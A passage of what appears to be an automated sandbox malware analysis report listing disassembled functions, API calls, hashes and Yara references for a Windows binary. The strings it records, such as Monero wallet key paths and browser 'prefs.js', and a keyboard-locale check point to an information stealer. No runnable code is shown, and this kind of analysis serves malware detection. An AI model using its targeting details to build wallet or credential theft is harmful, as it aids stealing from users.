                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: prefs.js
                                  • API String ID: 3334442632-3783873740
                                  • Opcode ID: d3e825d1fefc2604ea8caabfb5279972cdf76be8dac904000ef1a4240af23f56
                                  • Instruction ID: aca9e55dc93cbab5c6c9afbc863e7dc254880fb7d9723e0ed55f867fd868b0fb
                                  • Opcode Fuzzy Hash: d3e825d1fefc2604ea8caabfb5279972cdf76be8dac904000ef1a4240af23f56
                                  • Instruction Fuzzy Hash: 3FB12271A001189FDB24FF64DD96FEE7379AF64300F4085A9E40E96191EF346B49CBA2
                                  Function 00A716D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00A9510C,?,?,?,00A951B4,?,?,00000000,?,00000000), ref: 00A71923
                                  • StrCmpCA.SHLWAPI(?,00A9525C), ref: 00A71973
                                  • StrCmpCA.SHLWAPI(?,00A95304), ref: 00A71989
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A71D40
                                  • DeleteFileA.KERNEL32(00000000), ref: 00A71DCA
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00A71E20
                                  • FindClose.KERNEL32(000000FF), ref: 00A71E32
                                    • Part of subcall function 00A8A920: lstrcpy.KERNEL32(00000000,?), ref: 00A8A972
                                    • Part of subcall function 00A8A920: lstrcat.KERNEL32(00000000), ref: 00A8A982
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 1415058207-1173974218
                                  • Opcode ID: 8780f8f10d3ab5508613ffa6879d8d0b9779facb67eedc7135f4b3b69cb20045
                                  • Instruction ID: 83a75c4b90a226ea58c60bb16fa4273ef987aa4cea0af3b2c03bfb993fa56b79
                                  • Opcode Fuzzy Hash: 8780f8f10d3ab5508613ffa6879d8d0b9779facb67eedc7135f4b3b69cb20045
                                  • Instruction Fuzzy Hash: 9112D471D101189BEB19FB60DD96EEE7378AF64300F4045DAB50A66091EF386F89CFA1
                                  Function 00A7DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00A90C2E), ref: 00A7DE5E
                                  • StrCmpCA.SHLWAPI(?,00A914C8), ref: 00A7DEAE
                                  • StrCmpCA.SHLWAPI(?,00A914CC), ref: 00A7DEC4
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00A7E3E0
                                  • FindClose.KERNEL32(000000FF), ref: 00A7E3F2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2325840235-1173974218
                                  • Opcode ID: 237248fca4a0e5c5939981c61a1c767571ff06155bdf561f4bb292f0f826cad4
                                  • Instruction ID: 43e1b5d35c3bee0682c282225cff9d1427812af61ea8fb42b79cfb60303f7833
                                  • Opcode Fuzzy Hash: 237248fca4a0e5c5939981c61a1c767571ff06155bdf561f4bb292f0f826cad4
                                  • Instruction Fuzzy Hash: B3F1A4719141189AEB15FB60DD95EEE7378BF68300F8045DBB41A62091EF346F8ACF62
                                  Function 00E3B7CA Relevance: 14.0, Strings: 10, Instructions: 1525COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: "juv$/1~$1:y$3`?$Mv?$R\$ZXW$gHL$n8~$tb}u
                                  • API String ID: 0-1092568616
                                  • Opcode ID: 2254732dade7bc9a70ed7e3de0cc8169de2ed79ba4c9739254df34e5f4ee3056
                                  • Instruction ID: 98f06bdacf1126d92a00a298d9ff89c1916741592dc5ce5a022e05370495a76e
                                  • Opcode Fuzzy Hash: 2254732dade7bc9a70ed7e3de0cc8169de2ed79ba4c9739254df34e5f4ee3056
                                  • Instruction Fuzzy Hash: 04B2B3F360C2009FE304AE29EC8567AFBE5EF94720F16893DE6C487744E63598458B97
                                  Function 00A7DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A8A920: lstrcpy.KERNEL32(00000000,?), ref: 00A8A972
                                    • Part of subcall function 00A8A920: lstrcat.KERNEL32(00000000), ref: 00A8A982
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00A914B0,00A90C2A), ref: 00A7DAEB
                                  • StrCmpCA.SHLWAPI(?,00A914B4), ref: 00A7DB33
                                  • StrCmpCA.SHLWAPI(?,00A914B8), ref: 00A7DB49
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00A7DDCC
                                  • FindClose.KERNEL32(000000FF), ref: 00A7DDDE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: 98e9903e2a1d8efb9e47657b2025fd0818928fa5b89d5db8eac8c57bf6534a02
                                  • Instruction ID: 12d3e2f035a18457bfa4aa5c23b0532902ee144d26a3801d6703710afff3bfa9
                                  • Opcode Fuzzy Hash: 98e9903e2a1d8efb9e47657b2025fd0818928fa5b89d5db8eac8c57bf6534a02
                                  • Instruction Fuzzy Hash: 1F913A72A001049BDB14FB74DD56EED737DAF94300F40C669F94A96181EE38AB19CBA3
                                  Function 00A87B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                  • GetKeyboardLayoutList.USER32(00000000,00000000,00A905AF), ref: 00A87BE1
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00A87BF9
                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00A87C0D
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00A87C62
                                  • LocalFree.KERNEL32(00000000), ref: 00A87D22
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID: /
                                  • API String ID: 3090951853-4001269591
                                  • Opcode ID: 015501859a3498eddcb7f868ca5dbceb1cef9b34fbcd82a8ad2ecf421ea790bb
                                  • Instruction ID: f6ba143a775ee1c7f7e1924b982073fc3cb3467f95ab43c1da5884668758e929
                                  • Opcode Fuzzy Hash: 015501859a3498eddcb7f868ca5dbceb1cef9b34fbcd82a8ad2ecf421ea790bb
                                  • Instruction Fuzzy Hash: 1D413D71940218ABDB24EB94DD99FEEB3B8FF54700F2041D9E40962191DB746F85CFA1
                                  Function 00E40895 Relevance: 10.4, Strings: 7, Instructions: 1692COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: &:u$+r~}$7e9$J*V?$co'$xpW|$-_
                                  • API String ID: 0-2483857470
                                  • Opcode ID: 5ab2e06dffc6cfeb2a21f1dcae390fc8362edf1ccf80cf2dd24393d7e354625a
                                  • Instruction ID: 520935f0b2c892ba9f73e0e084fdd76af48a66e18415c43be7432cdfd45307a5
                                  • Opcode Fuzzy Hash: 5ab2e06dffc6cfeb2a21f1dcae390fc8362edf1ccf80cf2dd24393d7e354625a
                                  • Instruction Fuzzy Hash: 7FB249F3A0C210AFE3046E2DEC8567AB7E9EF94720F1A463DEAC4C7744E93558018697
                                  Function 00E4589D Relevance: 10.4, Strings: 7, Instructions: 1640COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: )!w|$5?$7.\_$zXz$+/$5/?$i??
                                  • API String ID: 0-3326637294
                                  • Opcode ID: 02fbefef333abbfe7479c653e426a9e2defffc72081118edd36b235e6740537b
                                  • Instruction ID: a1520ad6ddc4e0a61dd9d538c21a6da0a84b3846ac4f3a7759766d4ef601404a
                                  • Opcode Fuzzy Hash: 02fbefef333abbfe7479c653e426a9e2defffc72081118edd36b235e6740537b
                                  • Instruction Fuzzy Hash: F3B204F36082049FD304AE2DEC8567AFBE9EF94720F1A493DE6C4C7744EA3598058697
                                  Function 00A7E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A8A920: lstrcpy.KERNEL32(00000000,?), ref: 00A8A972
                                    • Part of subcall function 00A8A920: lstrcat.KERNEL32(00000000), ref: 00A8A982
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00A90D73), ref: 00A7E4A2
                                  • StrCmpCA.SHLWAPI(?,00A914F8), ref: 00A7E4F2
                                  • StrCmpCA.SHLWAPI(?,00A914FC), ref: 00A7E508
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00A7EBDF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 433455689-1173974218
                                  • Opcode ID: f47e308c9634c79f7ab05982292d23a413c31701acde9576a2ee182574110151
                                  • Instruction ID: 985596d4875ec6f0e7e19d674b2229e8c27f81295a439229255d82d7b5882727
                                  • Opcode Fuzzy Hash: f47e308c9634c79f7ab05982292d23a413c31701acde9576a2ee182574110151
                                  • Instruction Fuzzy Hash: 8A120871A101149BEB14FB70DE96EED7378AF64300F4045DAB50AA6091EF386F49CFA2
                                  Function 00E43ED7 Relevance: 9.1, Strings: 6, Instructions: 1562COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
